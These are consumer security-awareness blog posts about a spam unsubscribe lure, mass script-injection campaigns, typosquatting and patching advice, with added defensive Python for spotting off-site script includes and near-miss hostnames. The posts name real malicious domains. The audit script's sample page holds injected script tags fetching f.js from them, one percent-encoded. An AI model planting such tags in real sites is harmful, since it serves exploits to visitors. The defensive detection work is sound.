Virus


A new twist on an old scam: I had someone report a spam e-mail that appeared to come from Microsoft. A little quick research online showed this has been around for a few years, but this one has a different twist.

Sample Spam

As you can see, this was the entire body of the e-mail. Nothing to sell. No e-cards to click on. No official document from some bogus US Court. Just three innocent-looking links from everyone's friend Microsoft. The text makes you think you subscribed to MSN Featured Offers and they are being kind enough to add an Unsubscribe link. Since you never really subscribed to this in the first place, they are hoping people will click the Unsubscribe link so they won't have this sent anymore. All because they respect your privacy. Taking a closer look at the three links, they all lead to the same URL. The IP for the URL was registered in the USA. A quick Google search of the domain showed a lot of Russian-language references to this domain. After taking a closer look, all this URL did was redirect you to a site registered in Korea. This gives you a little more insight into how spam e-mail can be a threat. If this trail had been followed all the way through, exploits for Microsoft, QuickTime, RealPlayer, and possibly Adobe Reader would have been run against the PC, and if it were not patched, remote code execution could be possible, meaning the PC would have been added to someone's criminal botnet and used in nefarious ways.

Remember what we say, never click on unsolicited links or attachments in e-mail.  Stay safe.

Shadowserver.org does great work and informs the security community on the darker side of the Internet. In their most recent posting, they have listed the sites that are serving up the malicious content, along with the number of sites injected with each of these malicious domains. Please be advised: DO NOT VISIT ANY OF THESE SITES.


Most of the time, attacks from the Internet are silent. You may not have realized that clicking on your favorite web site silently redirected you to a server in China, and then exploits against Microsoft's Internet Explorer, Firefox, QuickTime, RealPlayer, and other applications were run against your PC. If you haven't patched all your software, some attacker might just be able to take control of your machine and execute code on it remotely. Those are words you really don't want to hear.

Eventually, your anti-virus vendor gets the signatures of the bad software loaded on your machine and can clean it off. But how did it get there? What do I use my PC for? Do I bank online? Do I access my investment accounts online? Do I store personal information about myself or my family in a document saved on the PC's hard drive? If so, you need to take steps to figure out just what happened.

First of all, is your software patched? If not, download your patches from Microsoft, Apple, RealPlayer, or any other application vendors and apply those security patches. Set up a routine so that your PC is scanned regularly and you check for patches regularly.

Can you find out if sites you visit have been hacked?  Sometimes you won’t know unless you really follow stories posted online.  If it is a big name site like CNN.com or USAToday.com, then you might know.  Hundreds of thousands of sites get hacked and you never really know.  You could possibly defend against these attacks by using a tool called NoScript with your Firefox browser.

Do you store passwords for sites so you are signed in when you browse to them? Are any of those sites holding a credit card of yours? If you've read my blog much, I advise you not to use the function that remembers passwords to sites.

One thing you have to remember: the Internet was not set up to handle secure transactions. It was set up to share information. Bad guys are taking advantage of all the vulnerabilities out there. I cannot guarantee you will be completely safe even following all these steps, but you can follow best practices and be safer than the average person. If you have teenagers, your battle will be an uphill fight. Teenagers trust everyone and click things that need not be clicked. Think about having one computer the adults use and another that the teenagers use. You'll still have to fight off attacks on the teenagers' PC.

Good luck and stay safe.  I’m ready for SUMMER!!!

Yep, you are reading that headline right. Yet another new code injection attack. Just prior to writing this post, the count stood at 855,000 pages infected with malicious (BAD!!) code that was injected into legitimate sites. NoScript is one defense, since this code is hosted on another domain.

The attack that I wrote about that started last week just hasn’t really taken off. Doing a Google search shows 25,500 pages that were affected by this one. It is early in the game for both of these attacks so more details will come out later. I’ll do more checking on the current attacks to see where those bad sites are being hosted.

The two sites in this new attack are listed below.  I’ve altered the URL.  My advice is NOT to go to either of these sites.

hxxp://free.hostpinoy.info/f.js
hxxp://xprmn4u.info/f.js
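The injected code in these campaigns is a single `<script src=...>` tag pulling a remote `f.js` from a domain that is not the site's own, which is exactly what NoScript blocks. The following is an added example, not code from the original post: a small audit script a site owner can run over their own pages to flag script includes served from anywhere other than the site itself. The site hostname and the sample page are constructed; the two injected hostnames are the ones listed above, the second written in a percent-encoded spelling so the check has to decode the hostname before comparing.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

SITE_HOST = "www.example-shop.test"   # constructed: the site being audited

# Constructed page: two legitimate includes, then two injected tags appended
# after </html>, where SQL-injected content usually lands. The second uses a
# percent-encoded spelling of xprmn4u.info to dodge naive string matching.
SAMPLE_PAGE = """<html><head>
<script src="/js/menu.js"></script>
<script src="http://www.example-shop.test/js/cart.js"></script>
</head><body><p>Welcome</p></body></html>
<script src="http://free.hostpinoy.info/f.js"></script>
<script src="http://%78%70%72%6D%6E%34%75%2E%69%6E%66%6F/f.js"></script>
"""

class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)

def script_host(src):
    """Lowercase, percent-decoded host a script src loads from, or None
    for a relative (same-origin) path. Userinfo and port are stripped."""
    netloc = urlsplit(src.strip()).netloc
    if not netloc:
        return None
    host = unquote(netloc).lower().rsplit("@", 1)[-1]
    return host.split(":")[0]

def find_offsite_scripts(html, site_host):
    """Return [(src, host)] for every script include not served by site_host."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    site_host = site_host.lower()
    return [(src, host) for src in collector.srcs
            for host in [script_host(src)]
            if host is not None and host != site_host]

if __name__ == "__main__":
    for src, host in find_offsite_scripts(SAMPLE_PAGE, SITE_HOST):
        print(f"off-site script from {host}: {src}")
```

Legitimate third-party includes (ad networks, analytics) will also be flagged, so compare the output against the includes you know you put there; anything else appended after the closing `</html>` tag deserves a look at the database, not just the page.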

Stay safe and HAPPY MOTHER’S DAY!!!

Well, it doesn't appear that this attack is spreading. I just did a Google search on one of the redirect domains and it showed only 14,000 pages. Not as efficient as the last one that blasted several hundred thousand pages. I still see some of the same names on this list, and it seems to be the smaller organizations, which probably don't have full-time staff to work on their sites and may not even know they have been compromised. Here is a short list of a few of the domains that are still making an appearance in Google. Remember that they may have already been cleaned and Google's spiders just haven't caught up.


I'll give an update on this if things pick up. If you want to see the number of sites infected, Google winzipices.cn and you'll get a pretty long list. Stay away unless you want your PC compromised. Stay safe and take care.

I don't have a lot of information at this time, other than that there appears to be another SQL injection attack similar to the ones we've seen, where legitimate sites are redirecting to sites in China that then launch different attacks that can compromise a machine. It may take a few days, but more information will come out about the details of this attack; at this time there isn't a lot out there. If you want to read more, you can go to the Internet Storm Center page by clicking here and read what they know.

As more information becomes available, I’ll post another story. Take care and have a safe week!

Happy Thursday! It's really Wednesday night, but many won't read this until tomorrow. If you are like me, you have your favorite sites you go to. Sometimes you have them marked as a favorite and sometimes you just type the address into the address bar of your favorite browser. Now for me, I use the Firefox browser and I have the NoScript addon installed. I've written about that addon before. I HIGHLY recommend adding it if you already use Firefox.

Sometimes if you want to go to Google.com to search for some topic you are researching, be careful how you type it in. There are times you want to type google.com but you type in gooogle.com. Or gogle.com. When you mistype it, you actually go to a site, and it may not be a friendly site. This practice is known as cyber squatting. People register websites close to a high-traffic website, and when people type in the wrong address, they are taken to a site they really don't want to go to. Sometimes cyber squatting is done to make money. For example, if you can predict a candidate who will run for office, then you can register a site at GoDaddy.com and let them pay you for your website. Like Hillaryforpresident.com. Not sure that is actually a real site, but it probably is. That is just an example. You have to be quick though.

The reason I say to be careful is that there are cyber criminals who have set up sites that will run exploits against any visitor to their sites. So when typing in your favorite sites, be very careful what you type. Where you are taken may not be a nice place. Stay safe and take care. Go Jayhawks!!!
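The squatter's bet is that a typed hostname lands one or two keystrokes away from the real one, as with the gooogle.com and gogle.com slips above. As an added example (not code from the original post), here is the check a browser helper could run before loading a page: measure how far the typed name is from each of the user's regular sites and warn on a near miss rather than an exact match. The favourites list and the typed names are constructed.

```python
FAVOURITES = ["google.com", "cnn.com", "usatoday.com"]  # constructed list

def edit_distance(a, b):
    """Damerau-Levenshtein distance: an insert, delete, substitute, or swap
    of adjacent characters each cost 1, so 'googel' is one step from
    'google' just like 'gooogle' and 'gogle' are."""
    prev2, prev1 = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            best = min(prev1[j] + 1, cur[j - 1] + 1, prev1[j - 1] + cost)
            if (prev2 is not None and j > 1
                    and ca == b[j - 2] and a[i - 2] == cb):
                best = min(best, prev2[j - 2] + 1)   # adjacent transposition
            cur.append(best)
        prev2, prev1 = prev1, cur
    return prev1[-1]

def check_typed_host(host, favourites=FAVOURITES, max_distance=2):
    """Return ('exact', site) when host is one of the favourites,
    ('near-miss', site) when it is within max_distance edits of one, which
    is the pattern a squatter relies on, and ('unknown', None) otherwise."""
    host = host.lower().strip()
    if host.startswith("www."):
        host = host[4:]
    if host in favourites:
        return "exact", host
    closest = min(favourites, key=lambda site: edit_distance(host, site))
    if edit_distance(host, closest) <= max_distance:
        return "near-miss", closest
    return "unknown", None

if __name__ == "__main__":
    for typed in ["google.com", "gooogle.com", "gogle.com", "googel.com",
                  "kansas.edu"]:
        print(f"{typed:<14} -> {check_typed_host(typed)}")
```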

This week, another cyber attack against legitimate sites is going on. Some of the security companies have been writing articles about it. Not a whole lot of details are known at this time, but some of the sites include several .edu's, .gov's, and of course there are always the big names. In this instance it was Trend Micro, a computer security company; they've taken care of the pages that were hacked. Similar to the other attacks earlier this year, the web applications themselves were attacked and then serve up exploits to any visitor to the site.

An Internet Storm Center Diary post lists the vulnerabilities being used in this latest attack. What do you do to defend against these types of attacks? Well, regular readers have heard it from me before, but the answer is the same. PATCH!!!!! Pretty simple. The weaknesses listed in this current post are all covered by Microsoft patches from 2006 and 2007. Not listed, but used more often, are some of the third-party applications like Adobe Reader, RealPlayer, WinZip, WinAmp, and on and on and on. These applications need patches too, so don't forget those.

The Big 12 tournament has started, so I'm pumped up. Rock Chalk Jayhawk. GO KU! That is it for now. Have a great weekend, and may your favorite team win unless they are playing the Kansas Jayhawks!!

Well, a couple of days ago the WordPress website was hit with a Denial of Service (DoS) attack. I understand there were times that some of us were unable to actually log in to our blogs. I didn't have any problem on my account, but I'm sure that was a timing thing for me. Hopefully not too many were affected by this attack.

Not really sure why WordPress was attacked. In a DoS attack, a website is sent many, many requests from many bots out there, more than it can handle. The bots can be instructed to send so many requests that the website can't handle the volume of visits to the site. Of course, if many of us would keep our PCs clean, then there wouldn't be so many bots available to do their malicious deeds.

Hope you have enjoyed reading my blog. It's pretty dry, a bit boring, downright blah. But if you do the things I suggest, then there would be less malicious activity. As it is for now, there are literally millions of bots out there being controlled by different organized groups. If you remember the Estonia DoS attacks late last year, that was another high-profile use of bots. They can be used to profit, to attack for the purpose of extorting money, or even for political reasons.

My point in this story is to learn as much as you can about computer security so you aren't a victim of these attackers, or at least so you can surely reduce your risk out there. Patching is probably the best thing you can do on your PC. Being careful where you surf also makes a difference. Don't surf porn or P2P file-sharing sites. Use some of the tools I suggest for your browser and other things. Reading is your best defense. Keep informed. Unite, patch, and be happy!!

Take care and have a great Friday and weekend. I know I will!! Rock chalk Jayhawk!! GO KU!!!!

With the latest JavaScript attacks that we've been seeing, it is now very important that you take steps to protect yourself from all the criminal attackers who try to take advantage of you. You had the uc8010 attacks, then you had the web servers that were compromised, where any website hosted on that web server was spreading crimeware to all who visited. I've written about both attacks.

So what to do? It sometimes sounds like a broken record, but I'll repeat it here. Patching your software is important. Very important. What tools can you use? Well, try Shavlik's Google Gadget. Click here to get this great tool. Many of the attacks are against known vulnerabilities. Knowing which applications you have that need patching is one of the most important things you can do. You can't defend yourself against 0-day attacks (ones for which there is no patch for the vulnerability yet), but this will go a long way toward protecting yourself.

Run up-to-date anti-virus and anti-malware applications. I use AVG's AV and anti-malware. Keep the updates current. Run these tools on your system so you can keep things clean. Click here for these downloads. Also install a more robust firewall. I use the free version of Comodo Firewall. Click here for your free download.

Be VERY careful when opening e-mails. They may seem to be from someone you know, but you really need to be very careful about unsolicited e-mails asking for personal information. Never give this private information out. Don't click on those links either. They are already seeing Valentine's malware, along with Super Bowl sites that are really malicious sites. Then tax time is right around the corner, and then comes Easter, and so on, and so on. You get the point. And be VERY careful with e-mails telling you about recent world events like storms, assassinations, or current tragedies; don't click on those types of links either.

While we are at it, let's talk strong passwords. You really ought to secure any of your financial sites with strong passwords that use upper- and lower-case letters, numbers, and special characters. A password of more than 8 characters would be a good idea too.

Use an alternative browser to Microsoft’s Internet Explorer.  I use the Firefox browser.  I added the NoScript addon as a defense against these latest attacks.  You have to actually do some work but in the long run, you’ll be safer.  This is no guarantee that you will stay safe but it goes a lot farther than not doing anything at all.

These are just a few things you can do. Do them all and you will be safer. I used to say stay away from porn and peer-to-peer downloading sites where you download music or movies illegally, and you will stay fairly safe. With the latest JavaScript attacks, you can't say that anymore. So take these extra steps and they will keep you safer.

Stay safe, and take steps to protect yourself!
